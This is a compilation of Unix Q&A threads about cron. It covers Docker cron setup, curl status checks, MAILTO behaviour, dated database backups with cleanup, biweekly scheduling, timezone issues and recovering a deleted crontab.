/usr/sbin/cron
So why is cron not running its jobs? What have I missed?
Dockerfile
FROM arm32v7/nginx
##add backports
COPY stretch-backports-source.list /etc/apt/sources.list.d/
##install cron and curl — so we can register dns regularly
RUN apt-get update &&\
apt-get install -y cron curl &&\
apt-get clean
##setup cron to register dns
COPY register-dns register-dns.auth register-dns-hostname /usr/local/bin/
COPY register-dns.cron /etc/cron.daily/1-register-dns
RUN chmod +x /usr/local/bin/register-dns /etc/cron.daily/1-register-dns
##add certbot
RUN apt-get update && \
apt-get -t stretch-backports install -y python-certbot-nginx && \
apt-get clean
#add ssl port
EXPOSE 443 80
##custom entry point — needed by cron
COPY entrypoint /entrypoint
RUN chmod +x /entrypoint
ENTRYPOINT ["/entrypoint"]
CMD ["nginx", "-g", "daemon off;"] #:tricky: we seem to need to re-specify this
LABEL name="my-nginx" \
description="nginx + cron + curl + certbot + dns-registering"
entrypoint
#!/bin/sh
## Do whatever you need with env vars here ...
service cron start
# Hand off to the CMD
exec "$@"
/etc/crontab
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
/etc/cron.daily/1-register-dns
#!/bin/sh
date >> /var/log/register-dns
/usr/local/bin/register-dns >>/var/log/register-dns
|
I installed rsyslog to see what errors I was getting, and I got the following:
(*system*) NUMBER OF HARD LINKS > 1 (/etc/crontab). A bit of searching told me that cron has a security policy to not work if there are lots of hard-links to its files. Unfortunately Docker's layered file-system makes files have lots of hard-links.
To fix it, I added touch /etc/crontab /etc/cron.*/* to the start-up script, before running cron. This detaches these files from the other hard-linked instances.
The new entrypoint is
#!/bin/sh
#fix link-count, as cron is being a pain, and docker is making hardlink count >0 (very high)
touch /etc/crontab /etc/cron.*/*
service cron start
# Hand off to the CMD
exec "$@"
I have tested and it works
Summary
To get cron to work you will have to:
Install cron — if not installed
Add cron job to /etc/cron.daily/ (or weekly). Ensure that your script-name, has only letters, numbers, hyphens, no dots. (Don't ask) see cron job not running from cron.daily
Get the hard-link count of cron's config files down to one: do touch /etc/crontab /etc/cron.*/* — (if in Docker). I put it in the start-up script.
Start cron: service cron start — (if on a minimal OS with no init system, as in a lot of base images for use in Docker). I put it in the start-up script.
The entrypoint script from this answer, and everything else from the question, will do it. Current project can be fetched with hg clone ssh://[email protected]/davids_dad/a_website
| Getting cron to work on docker |
1,327,513,801,000 |
I figure curl would do the job. I wrote in a script:
#!/bin/sh
function test {
res=`curl -I $1 | grep HTTP/1.1 | awk {'print $2'}`
if [ $res -ne 200 ]
then
echo "Error $res on $1"
fi
}
test mysite.com
test google.com
The problem here is no matter what I do I can't get it to stop printing the below to stdout:
% Total % Received % Xferd Average Speed Time Time Time Current
I want a cron job to run this script, but if it prints that progress output I'll get an email every time it runs (cron mails anything written to stdout), even though the site may be fine.
How do I get the status code without getting junk into stdout? This code works except the bonus junk to the stdout preventing me from using it.
|
-s/--silent
Silent or quiet mode. Don't show progress meter
or error messages. Makes Curl mute.
So your res should look like
res=`curl -s -I $1 | grep HTTP/1.1 | awk {'print $2'}`
Result is Error 301 on google.com, for example.
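An alternative worth knowing: curl can print just the status code via -w '%{http_code}', which avoids parsing headers entirely. A sketch (the function name is arbitrary; note that the question's choice of test as a function name shadows the shell's test builtin):

```shell
#!/bin/sh
check_status() {
    # -s: silent (no progress meter); -o /dev/null: discard the body;
    # -w '%{http_code}': print only the numeric response code
    code=$(curl -s -o /dev/null -w '%{http_code}' "$1")
    if [ "$code" -ne 200 ]; then
        echo "Error $code on $1"
    fi
}

# Usage (requires network access):
# check_status https://example.com/
```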
| How do I get (only) the http status of a site in a shell script? |
1,327,513,801,000 |
I have a cron job running a php command like this:
php /path/to/script.php > /dev/null
This should send only STDERR output to the MAILTO address. From what I gather the php script is not outputting any STDERR information even when its exit status is 1.
How can I get the output of the php command (STDOUT) and only send it to MAILTO if the exit status is non-zero?
|
php /path/to/script.php > logfile || cat logfile; rm logfile
which dumps standard output into logfile and only outputs it if the script fails (exits non-zero).
Note: if your script might also output to stderr then you should redirect stderr to stdout. Otherwise anything printed to stderr will cause cron to send an email even if the exit code is 0:
php /path/to/script.php > logfile 2>&1 || cat logfile; rm logfile
| Have cron email output to MAILTO based on exit status |
1,327,513,801,000 |
If I need a cronjob that runs at system level (i.e. not specific for a certain user) how do you suggest me to create it?
running crontab -e as root
appending it to /etc/crontab
creating a file defining the cronjob in /etc/cron.d/
creating a file defining the cronjob in /etc/cron.*ly/ (but only if such time interval fits my needs)
What worries me mostly is: which of these solutions will be possibly overwritten by a system update?
Additionaly I guess that if the job is long I should put it on a separate script file, for instance in /root/bin/. Do you agree?
|
Don't use crontab -e
I wouldn't put it in crontab -e as root. This is generally less obvious to other admins and is likely to get lost over time. By putting jobs in /etc/crontab, you can specify exactly the time that you want them to run, and you can specify a different user as well.
Alternative locations
If you do not care about running the script as a different user, and/or you just want the script to run weekly, daily, etc. then several distributions provide directories where scripts can be placed that will automatically get processed at a specific time.
For example under Redhat based distros:
$ ls -dl /etc/cron*
drwxr-xr-x. 2 root root 4096 Nov 29 11:06 /etc/cron.d
drwxr-xr-x. 2 root root 4096 Nov 29 11:06 /etc/cron.daily
-rw-------. 1 root root 0 Nov 23 07:42 /etc/cron.deny
drwxr-xr-x. 2 root root 4096 Nov 29 11:03 /etc/cron.hourly
drwxr-xr-x. 2 root root 4096 Nov 29 11:06 /etc/cron.monthly
-rw-r--r--. 1 root root 457 Sep 26 2011 /etc/crontab
drwxr-xr-x. 2 root root 4096 Sep 26 2011 /etc/cron.weekly
I'll often put system level crons that I want to run at a specific time in /etc/cron.d instead of /etc/crontab, especially if they're more complex scripts.
I prefer using the directories under /etc/cron* because they're a much more obvious place that other system administrators will know to look and the files here can be managed via packages installations such as rpm and/or apt.
Protecting entries
Any of the directories I've mentioned are designated for putting scripts that will not get destroyed by a package manager. If you're concerned about protecting a crontab entry, then I would definitely not put it in the /etc/crontab file, and instead put it as a proper script in one of the /etc/cron* directories.
| Where to put system cronjobs? |
1,324,046,017,000 |
I believe that if there is any output from a cronjob it is mailed to the user who the job belongs to. I think you can also add something like [email protected] at the top of the cron file to change where the output is sent to.
Can I set an option so that cron jobs system-wide will be emailed to root instead of to the user who runs them? (i.e. so that I don't have to set this in each user's cron file)
|
Check the /etc/crontab file and set MAILTO=root in there. It might also be needed in the /etc/rc file.
crond seems to accept a MAILTO variable. I'm not completely sure, but it's worth trying to change the environment variable for crond before it is started, for example in /etc/sysconfig/crond or in the /etc/rc.d/init.d/crond script which sources that file.
Example:
[centos@centos scripts]$ strings /usr/sbin/crond | grep -i mail
ValidateMailRcpts
MailCmd
cron_default_mail_charset
usage: %s [-n] [-p] [-m <mail command>] [-x [
CRON_VALIDATE_MAILRCPTS
mailed %d byte%s of output but got status 0x%04x
[%ld] no more grandchildren--mail written?
MAILTO
/usr/sbin/sendmail
mailcmd too long
[%ld] closing pipe to mail
MAIL
| Can I change the default mail recipient on cron jobs? |
1,324,046,017,000 |
I've tried eliminating many of the common errors,
ensuring that the PATHs are available for cron
there is an endline at the end of crontab file
the timezone is set-up by:
cd /etc
cp /usr/share/zoneinfo/Asia/Singapore /etc/localtime
Running date in bash, I get:
Tue Sep 17 15:14:30 SGT 2013
In order to check if cron is using the same time,
* * * * * date >> date.txt
is giving the same date output in date.txt.
This is the script I'm trying to execute:
event.sh:
#!/usr/bin/env bash
echo data > /root/data.txt
Using crontab -e, the lines below work:
* * * * * /bin/bash /root/event.sh >/tmp/debug.log 2>&1
15 * * * * /bin/bash /root/event.sh >/tmp/debug.log 2>&1
However, when I tried some other arguments, hoping it would run at 2.50pm:
50 14 * * * /bin/bash /root/event.sh >/tmp/debug.log 2>&1
or
50 14 * * * (cd /root ; ./event.sh >/tmp/debug.log 2>&1)
it will no longer work. Seems like there is a problem with my hour argument. Nothing could be found in the /tmp/debug.log file either.
SOLUTION:
It turned out I had to restart the cron service after making changes to the timezone.
|
First off, the odds that you are hitting a bug that causes one field to be incorrectly considered seems exceptionally low. It's more likely to be a misunderstanding of what's going on and what cron expects.
In this case, we found out in the comments to the question that it was very likely a timezone related issue. For this, you would:
Add an entry like * * * * * date to the crontab
Remove (or comment out) any TZ assignment from the crontab
This forces date to run with the time zone setting of the invoker, which means the cron daemon. Look at the output; it will show what time zone cron is using internally, and thus highly likely which time zone it wants its time fields in. If you have a TZ assignment in the crontab, it is easily possible that the TZ environment variable assignment is passed through to the invoked commands but cron itself uses some other time zone. By commenting out or removing the TZ assignment, you avoid this ambiguity.
Also note that any changes to the system global timezone settings (including e.g. /etc/localtime) almost certainly require at least a restart of the cron daemon, and possibly (though unlikely) a system reboot to take full effect. Editing the TZ assignment in the crontab should not require a reload of the cron daemon, as it should detect that the file has been changed and reload it automatically.
| Cron job does not fire up after a timezone change |
1,324,046,017,000 |
I have jobs that I want to run hourly, but not necessarily at the same time, which I think
0 * * * * job
Means run at the 0 minute of every hour on the dot.
I know I can also use
@hourly job
What is the difference if any?
How can I schedule Jobs to run Hourly, but not all at the same time?
|
From crontab(5):
@hourly: Run once an hour, ie. "0 * * * *".
So it's strictly the same.
To run a job at a varying point in the hour (or multiple jobs, to spread the load) you can sleep for a random amount of time before starting the job:
@hourly sleep $((RANDOM / 10)); dowhatever
This sleeps for up to 3276 seconds (nearly an hour), then runs the job. So every time cron starts the job, it waits a different amount of time before actually starting.
| @hourly vs 0 * * * * - Cron - How to run jobs hourly, but at different times |
1,324,046,017,000 |
I am using the latest Linux Mint.
I was wondering if it's possible to create a special cronjob for a database backup.
In my /etc/crontab file I have the following code:
# Minute Hour Day of Month Month Day of Week Command
# (0-59) (0-23) (1-31) (1-12 or Jan-Dec) (0-6 or Sun-Sat)
30 4 * * 1-6 /home/users/backup.sh
In my /home/users/backup.sh I have:
mysqldump -uroot -p MyDatabase > /home/users/backup_MyDB/full_myDB.sql
Instead of full_myDB.sql I would like to have something like 2014-04-04_full_myDB.sql where the date is added dynamically depending on the date we have.
If the SQL Backup file is older than one week I would like the cronjob to delete it automatically.
|
With GNU date (default on Linux Mint) you can do:
mysqldump -uroot -p MyDatabase >/home/users/backup_MyDB/$(date +%F)_full_myDB.sql
To delete files older than 1 week:
find /home/users/backup_MyDB -type f -mtime +7 -exec rm {} +
Generally it is wise to see what you are deleting before you delete (at least when testing your script); for that, just run:
find /home/users/backup_MyDB -type f -mtime +7
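Putting both pieces together, /home/users/backup.sh could look like the sketch below (database name and paths from the question; the -name filter is an extra safety measure I've added so only backup files can ever be deleted):

```shell
#!/bin/sh
# Daily date-stamped MySQL dump with one-week retention
BACKUP_DIR=${BACKUP_DIR:-/home/users/backup_MyDB}
dumpfile="$BACKUP_DIR/$(date +%F)_full_myDB.sql"   # e.g. 2014-04-04_full_myDB.sql

mysqldump -uroot -p MyDatabase > "$dumpfile"

# Remove only backup files older than one week
find "$BACKUP_DIR" -type f -name '*_full_myDB.sql' -mtime +7 -exec rm {} +
```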
| cronjob for automatic DB backup to date prefixed file |
1,324,046,017,000 |
$ touch aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaBBB
$ crontab aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaBBB
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa: No such file or directory
This behavior seems quite unusual (noticing how it also truncates the path in the error message). I'm using Debian bullseye 11.
Is this a bug, or is there a specific reason why crontab has such a peculiar limitation?
I'm not able to replicate it on the docker image here: https://hub.docker.com/r/willfarrell/crontab
|
The version of crontab from Cygwin prints an explanatory error message:
file=abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZabcd
touch "$file"
crontab "$file"
crontab: usage error: filename too long
echo "$file" | awk '{print length}'
108
The message addresses your concern, albeit without providing an explanation.
Unfortunately the version on Debian doesn't explain well:
crontab "$file"
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTU: No such file or directory
echo 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTU' | awk '{print length}'
99
However, the source code (apt-get source crontab) gives a massive clue in cron.h:
#define MAX_FNAME 100 /* max length of internally generated fn */
And then in crontab.c:
static char Filename[MAX_FNAME];
…
(void) strncpy (Filename, argv[optind], (sizeof Filename)-1);
Filename[(sizeof Filename)-1] = '\0';
In case it's not obvious from these snippets, there's a hard-coded 99 character limit on the length of the filename. I can't see a reason for this other than an arbitrary "that should be long enough". The proper approach would probably have been to use PATH_MAX+1, but the author(s) didn't do that. A comment notes that the code could have been written as early as 1988 (or as late as 1994), but quite possibly pre-POSIX where this constant was formalised.
| When a file path longer than 100 characters is passed, crontab throws an error saying "No such file or directory" |
1,324,046,017,000 |
I want to schedule a python script to run using cron on certain dates. The problem is that in order for example.py to work, example-env has to be activated. Is there a way to make example.py activate its own virtualenv whenever cron executes it?
if not, then do I have to create a bash script bash.sh that contains
#!/usr/bin/env bash
workon example-env
python2 example.py
and then schedule that to be executed by cron on certain dates? Or do I have to do something else?
Both ways are fine with me; I just want to know the correct way to do it. I lean toward the bash script method, since I have many Python files to run, and putting them all inside one bash script and scheduling that seems easier. But again, I don't know the correct way, so I'm asking for advice.
|
You can just start the example.py with the full path to example-env/bin/python2.
Alternatively change the shebang line of the example.py to use that executable, make that file executable (chmod +x example.py) and leave out python and use the full path to example.py to start it:
#!/full/path/to/example-env/bin/python2
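For example, a crontab entry invoking the virtualenv's interpreter directly could look like this (all paths are hypothetical; adjust to where virtualenvwrapper keeps your environments):

```shell
# m h dom mon dow  command
0 3 * * 1 /home/user/.virtualenvs/example-env/bin/python2 /home/user/scripts/example.py
```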
| How to activate Virtualenv when a Python script starts? |
1,324,046,017,000 |
I'm pretty new to Unix and cron, and I was about to add jobs to an existing cron file. I read you could do this with crontab -e. The confusing thing to me is that crontab -e shows different crons/commands than less /etc/crontab - how come? Which one is the correct way/file to edit?
|
Although @X Tian's answer contains info on the different files for crontab, the essential information concerning your question is this:
crontab -e edits the user's crontab file (stored in the /var/spool/cron/crontabs/ directory on current Debian systems, but YMMV) or creates a new one, and not /etc/crontab. Similar for crontab -l (list crontab file) and crontab -r (remove crontab file).
For all cron jobs that should be executed under a user's account, you should use crontab -e. For system jobs, you should add a file under /etc/cron.d, if that exists; under /etc/cron.{hourly|daily|weekly|monthly} (but those must not be named like a package name!), if that fits your purpose; or add a line to /etc/crontab. But be aware that /etc/crontab might be overwritten with a system update.
| How come crontab -e is different from less /etc/crontab? |
1,324,046,017,000 |
I've done quite a bit of research in how to do this, and I see there's no direct way in cron to run a job, say, every other Thursday.
Right now, I'm leaning toward making a script that will just run every week, and will touch a "flag" file when it runs, and if it runs and the file is already there, to remove the file (and not perform the bi-weekly action).
My question is, is there any other more elegant or simpler way to accomplish this goal of a bash script of actions running every other week automatically?
Thanks!
|
0 0 * * Thu bash -c '(($(date +\%s) / 86400 \% 14))' && your-script
I used bash to do my math because I'm lazy; switch that to whatever you like. I take advantage of January 1, 1970 being a Thursday; for other days of the week you'd have to apply an offset. Cron needs the percent signs escaped.
Quick check:
function check {
when=$(date --date="$1 $(($RANDOM % 24)):$(($RANDOM % 60))" --utc)
echo -n "$when: "
(($(date +%s --date="$when") / 86400 % 14)) && echo run || echo skip
}
for start in "2010-12-02" "2011-12-01"; do
for x in $(seq 0 12); do
check "$start + $(($x * 7)) days"
done
echo
done
Note I've chosen random times to show this will work if run anytime on Thursday, and chosen dates which cross year boundaries plus include months with both 4 and 5 Thursdays.
Output:
Thu Dec 2 06:19:00 UTC 2010: run
Thu Dec 9 23:04:00 UTC 2010: skip
Thu Dec 16 05:37:00 UTC 2010: run
Thu Dec 23 12:49:00 UTC 2010: skip
Thu Dec 30 03:59:00 UTC 2010: run
Thu Jan 6 11:29:00 UTC 2011: skip
Thu Jan 13 13:23:00 UTC 2011: run
Thu Jan 20 20:33:00 UTC 2011: skip
Thu Jan 27 16:48:00 UTC 2011: run
Thu Feb 3 17:43:00 UTC 2011: skip
Thu Feb 10 05:49:00 UTC 2011: run
Thu Feb 17 08:46:00 UTC 2011: skip
Thu Feb 24 06:50:00 UTC 2011: run
Thu Dec 1 21:40:00 UTC 2011: run
Thu Dec 8 23:24:00 UTC 2011: skip
Thu Dec 15 22:27:00 UTC 2011: run
Thu Dec 22 02:47:00 UTC 2011: skip
Thu Dec 29 12:44:00 UTC 2011: run
Thu Jan 5 17:59:00 UTC 2012: skip
Thu Jan 12 18:31:00 UTC 2012: run
Thu Jan 19 04:51:00 UTC 2012: skip
Thu Jan 26 08:02:00 UTC 2012: run
Thu Feb 2 17:37:00 UTC 2012: skip
Thu Feb 9 14:08:00 UTC 2012: run
Thu Feb 16 18:50:00 UTC 2012: skip
Thu Feb 23 15:52:00 UTC 2012: run
| Run a script via cron every other week |
1,324,046,017,000 |
tl;dr: Does cron use the numerical value of an interval compared to the numerical value of the day to determine its time of execution or is it literally "every 3 days" at the prescribed time from creation?
Question:
If I add the following job with crontab -e will it run at midnight tomorrow for the first time or three days from tomorrow? Or is it only on "third" days of the month? Day 1, 4, 7, 10...?
0 0 */3 * * /home/user/script.sh
I put this cron in yesterday and it ran this morning (that might be the answer to my question) but I want to verify that this is correct. Today is the 31st and that interval value does appear to fall into the sequence. If cron starts executing an interval on the 1st of the month, will it run again tomorrow for me?
Additional notes:
There are already some excellent posts and resources about cron in general (it is a common topic I know) however the starting point for a specific interval isn't as clear to me. Multiple sources word it in multiple ways:
This unixgeeks.org post states:
Cron also supports 'step' values.
A value of */2 in the dom field would mean the command runs every two days
and likewise, */5 in the hours field would mean the command runs every
5 hours.
So what is implied really by every two days?
This answer states that a cronjob of 0 0 */2 * * would execute "at 00:00 on every odd-numbered day (default range with step 2, i.e. 1,3,5,7,...,31)"
Does cron always step from the first day of the month?
It appears that the blog states the cron will execute on the 31st and then again on the 1st of the next month (so two days in a row) due to the interval being based on the numeric value of the day.
Another example from this blog post
0 1 1 */2 * command to be executed is supposed to execute the first day of month, every two months at 1am
Does this imply that the cron will execute months 1,3,5,7,9,11?
It appears that cron is designed to execute interval cronjobs (*/3) based on the numerical value of the interval compared to the numerical value of the day (or second, minute, hour, month). Is this 100% correct?
P.S. This is a very specific question about one particular feature of cron that (I believe) needs some clarification. This should allow Google to tell you, with 100% certainty, when your "every 3 months" cron will run for the first time after it's been added to crontab.
|
The crontab(5) man page uses wording that is pretty clear:
Step values can be used in conjunction with ranges. Following a range with "/number" specifies skips of the number's value through the range. For example, "0-23/2" can be used in the hours field to specify command execution every other hour (the alternative in the V7 standard is "0,2,4,6,8,10,12,14,16,18,20,22"). Steps are also permitted after an asterisk, so if you want to say "every two hours", just use "*/2".
The exact wording (and the example) is "skips of the number's value through the range" - and it is implied that it starts at the first number in the range.
This means that if the range is 1-31 for days, the values matched in the case of 1-31/2 or */2 are 1, 3, 5, 7, etc. It also means that the range is reset to the start value when it has run through.
So you are also correct that in this case, the cronjob would run both on the 31st and on the 1st of the month after.
Please note that cron treats the "day of month" and "day of week" fields specially: if both are restricted (i.e. not *), the job runs when either field matches. So you should restrict only one of the two when running jobs with an interval of days.
If you want to define a cronjob that runs perfectly every other day, you have to use multiple lines and custom define each month according to the current calendar.
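You can preview the matched set by expanding the range with the same step, for example with seq:

```shell
# Days of month matched by */2 (i.e. 1-31/2); the sequence restarts from 1
# each month, which is why the job fires on the 31st and again on the 1st
seq 1 2 31 | tr '\n' ' '; echo
# prints: 1 3 5 7 9 11 13 15 17 19 21 23 25 27 29 31
```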
| When will an interval cron execute the first time? (Ex: */3 days) |
1,324,046,017,000 |
I was trying to edit crontab in the terminal, and I accidentally typed crontab -r instead of crontab -e. Who would figure such a dangerous command would sit right next to the letter used to edit the crontab? Moreover, I am still trying to figure out why crontab -r does not ask for confirmation.
Regardless of my lack of credibility as to how this is possible, my question is: am I able to recover the lost crontab?
|
You can recover your cron jobs from the log, if they have executed at least once before. Check /var/log/cron.
Other than that, you do not have any recovery option short of third-party file recovery tools.
| How to recover deleted crontab |
1,324,046,017,000 |
I use CentOS shared server environment with Bash.
ll "$HOME"/public_html/cron_daily/
brings:
./
../
-rwxr-xr-x 1 user group 181 Jul 11 11:32 wp_cli.sh*
I don't know why the filename has an asterisk in the end. I don't recall adding it and when I tried to change it I got this output:
[~/public_html]# mv cron_daily/wp_cli.sh* cron_daily/wp_cli.sh
+ mv cron_daily/wp_cli.sh cron_daily/wp_cli.sh
mv: `cron_daily/wp_cli.sh' and `cron_daily/wp_cli.sh' are the same file
This error might indicate why my Cpanel cronjob failed:
Did I do anything wrong when changing the file or when running the Cpanel cron command? Because both operations seem to fail.
|
The asterisk is not actually part of the filename. You are seeing it because the file is executable and your alias for ll includes the -F flag:
-F
Display a slash ('/') immediately after each pathname that is a directory, an asterisk ('*') after each that is executable, an
at sign ('@') after each symbolic link, an equals sign (`=') after each socket, a percent sign ('%') after each whiteout, and a
vertical bar ('|') after each that is a FIFO.
As Kusalananda mentioned you can't glob all scripts in a directory with cron like that. With run-parts, you can call "$HOME"/public_html/cron_daily/ to execute all scripts in the directory (not just .sh) or loop through them as mentioned in this post.
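As a sketch of the loop alternative (the directory and script names here are illustrative, created just for the demonstration):

```shell
# Create a throwaway directory with one executable script, then run every
# executable *.sh in it - the pattern a crontab entry could use instead of
# a bare glob.
dir=./cron_daily_demo
mkdir -p "$dir"
printf '#!/bin/sh\necho ran\n' > "$dir/wp_cli.sh"
chmod +x "$dir/wp_cli.sh"
for f in "$dir"/*.sh; do
  [ -x "$f" ] && "$f"
done
rm -r "$dir"
```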
| A filename has an asterisk for some reason - it won't be changed and content not executed |
1,324,046,017,000 |
I have a Raspberry Pi running OSMC (Debian based).
I have set a cron job to start a script, sync.sh, at midnight.
0 0 * * * /usr/local/bin sync.sh
I need to stop the script at 7am. Currently I am using:
0 7 * * * shutdown -r now
Is there a better way? I feel like rebooting is overkill.
Thanks
|
You can run it with the timeout command,
timeout - run a command with a time limit
Synopsis
timeout [OPTION] NUMBER[SUFFIX] COMMAND [ARG]...
timeout [OPTION]
Description
Start COMMAND, and kill it if still running after NUMBER seconds. SUFFIX may be 's' for seconds (the default), 'm' for minutes, 'h' for hours or 'd' for days.
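So the midnight entry could become something like the following (the script path is illustrative), which starts the sync and kills it after 7 hours with no reboot needed:

```shell
# The crontab entry could become (path illustrative):
#   0 0 * * * timeout 7h /usr/local/bin/sync.sh
# GNU timeout exits with status 124 when it had to kill the command:
timeout 1s sleep 5
echo "exit status: $?"
```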
PS. If your sync process takes too much time, you might consider a different approach for syncing your data, maybe block replication.
| How to halt a script at a specific time until it is started again by cron? |
1,324,046,017,000 |
It looks like I have logcheck set up as a cron job, and whenever it runs, the grep process spawned by logcheck takes up around ¼ of my CPU.
Now, there are certain times during which I need my full CPU capacity and want my system to take up as few resources as possible, except for specific processes (which I could maybe specify somehow).
Is it possible to set my Debian 9.1 with KDE machine into some sort of performance mode (or 'Gaming mode') that prevents processes not explicitly started by the user from taking up much system resources, lowers the load of background-processes and most importantly: delays cron jobs until that mode is stopped again?
|
If “certain times” aren’t fixed, i.e. you want to specify manually when your system enters and leaves “performance mode”, you can simply stop and start cron:
sudo systemctl stop cron
will prevent any cron jobs from running, and
sudo systemctl start cron
will re-enable them.
You could also check out anacron instead of cron, it might be easier to tweak globally in a way which would fit your uses.
| How to prevent cron jobs from being run during certain times in Debian? (a 'gaming' / 'performance mode') |
1,324,046,017,000 |
I have created a script to install two scripts on to the crontab.
#!/bin/bash
sudo crontab -l > mycron
#echo new cron into cron file
echo "*/05 * * * * bash /mnt/md0/capture/delete_old_pcap.sh" >> mycron #schedule the delete script
echo "*/12 * * * * bash /mnt/md0/capture/merge_pcap.sh" >> mycron #schedule the merge script
#install new cron file
crontab mycron
rm mycron
The script runs and adds the two lines to the crontab. But if I run the script again, it adds those lines again, so I end up with four lines saying the same thing. I want the install script to run such that the lines inserted into the crontab are not duplicated. How can I do that?
|
I would recommend using /etc/cron.d over crontab.
You can place files in /etc/cron.d which behave like crontab entries. Though the format is slightly different.
For example
/etc/cron.d/pcap:
*/05 * * * * root bash /mnt/md0/capture/delete_old_pcap.sh
*/12 * * * * root bash /mnt/md0/capture/merge_pcap.sh
The difference in the format is adding the user to run the job as after the time specification.
Now you can simply check if the file exists, and if you overwrite it, it doesn't matter.
Note that it's possible your cron daemon might not have /etc/cron.d. I do not know which cron daemons have it, but vixie-cron is the standard cron daemon on Linux, and it does.
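If you do want to stay with crontab, a sketch of making the original install script idempotent: filter out any previous copies of the lines before appending them (paths as in the question; the install step itself is left commented out):

```shell
# Keep the current crontab minus previous copies of our entries, then
# append fresh ones; install afterwards with: crontab mycron
{ crontab -l 2>/dev/null || true; } | grep -vF '/mnt/md0/capture/' > mycron || true
echo '*/05 * * * * bash /mnt/md0/capture/delete_old_pcap.sh' >> mycron
echo '*/12 * * * * bash /mnt/md0/capture/merge_pcap.sh' >> mycron
# crontab mycron && rm mycron   # uncomment to actually install
```

Because the `grep -vF` removes earlier copies first, running the script repeatedly leaves exactly one copy of each entry.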
| Installing crontab using bash script |
1,324,046,017,000 |
Is there any way to make/run a bash script on reboot
(like in Debian/Ubuntu for instance, since thats what my 2 boxes at home have)
Also, any recommended guides for doing cron jobs? I'm completely new to them (but they will be of great use)
|
On Ubuntu/Debian/CentOS you can set up a cron job to run @reboot. This runs once at system startup. Use crontab -e to edit the crontab and add a line like the following:
@reboot /path/to/some/script
There are lots of resources for cron if you look for them. This site has several good examples.
| Bash Script on Startup? (Linux) |
1,324,046,017,000 |
In my /etc/crontab file I have:
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
I know what this does in practice, but I don't understand the command lines.
Man "test" doesn't help at all:
test - check file types and compare values
Any help would be greatly appreciated
|
From FreeBSD's man test: [1]
-x file True if file exists and is executable. True indicates only
that the execute flag is on. If file is a directory, true
indicates that file can be searched.
So the cron jobs test whether anacron is installed [2] (i.e., there is an executable called anacron in the expected place) and, if not, run the scripts in the respective /etc/cron.* folders.
(1) Bash's builtin test has the same -x option
(2) Anacron is a cron replacement designed for computers that are not always running, i.e., if there's a job to be run weekly, it will be run weekly, relative to the uptime of the computer, which means it will not run every, say, friday, but every 24*7 hours of uptime. (Edit I got it all wrong, see comments)
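The `A || B` pattern is easy to try interactively; the right-hand side only runs when the left-hand side fails:

```shell
# /bin/sh exists and is executable on any POSIX system; the second path
# should not exist, so the fallback after || runs.
test -x /bin/sh        && echo "sh is executable"
test -x /no/such/file  || echo "fallback runs instead"
```

This is exactly the structure of the crontab entries: `test -x /usr/sbin/anacron || ( ...run-parts... )`.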
| /etc/crontab what does "test -x" stand for |
1,324,046,017,000 |
I have a test.sh script
#!/bin/sh
php /home/v/file.php
sh /root/x/some.sh
when I execute the file as root from command line it works.
sh /home/v/test.sh
When I set it in crontab -e (the root crontab), it does not work:
* * * * * sh /home/v/test.sh
What do I do wrong?
Thanks
|
According to the man:
The cron daemon starts a subshell from your HOME directory. If you schedule a command to run when you are not logged in and you want commands in your .profile file to run, the command must explicitly read your .profile file.
The cron daemon supplies a default environment for every shell, defining HOME, LOGNAME, SHELL (=/usr/bin/sh), and PATH (=/usr/bin).
So cron daemon doesn't know where php is and you should specify the full php path by hand, for example (I don't know your real PHP path):
#!/bin/sh
/usr/local/bin/php /home/v/file.php
sh /root/x/some.sh
Another way is to source the /etc/profile (or your .profile/.bashrc), for example
* * * * * . /home/v/.bashrc ; sh /home/v/test.sh
This is useful if your .bashrc set the environment variables that you need (i.e. PATH)
EDIT
An interesting reading is "Newbie: Intro to cron", don't undervalue the article from the title (It's a reading for everybody), in fact it's well written complete and answer perfectly to your question:
...
PATH contains the directories which will be in the search path for cron, e.g. if you've got a program 'foo' in the directory /usr/cog/bin, it might be worth adding /usr/cog/bin to the path, as it will stop you having to use the full path to 'foo' every time you want to call it.
...
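That advice can be applied directly at the top of the crontab itself, since vixie-cron allows variable assignments there (the PATH value below is illustrative; include whatever directory `which php` reports on your system):

```
PATH=/usr/local/bin:/usr/bin:/bin

* * * * * sh /home/v/test.sh
```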
| executing a sh script from the cron |
1,324,046,017,000 |
I am aware of a lot of pitfalls in the magic world of crontabs, but sometimes it would help troubleshooting a lot when you have some smart way to enter an interactive (bash) shell with exact identical environment as when a shell script is run from a crontab.
Now I thought myself of /bin/openvt -c8 -- /bin/bash --noprofile -l, but it requires root privileges, sets too many variables, and a simple su myusername sets a lot of extra environment.
Does anybody know of a way to start an interactive bash shell with an identical-to-cron environment, without requiring root privileges, on Kubuntu?
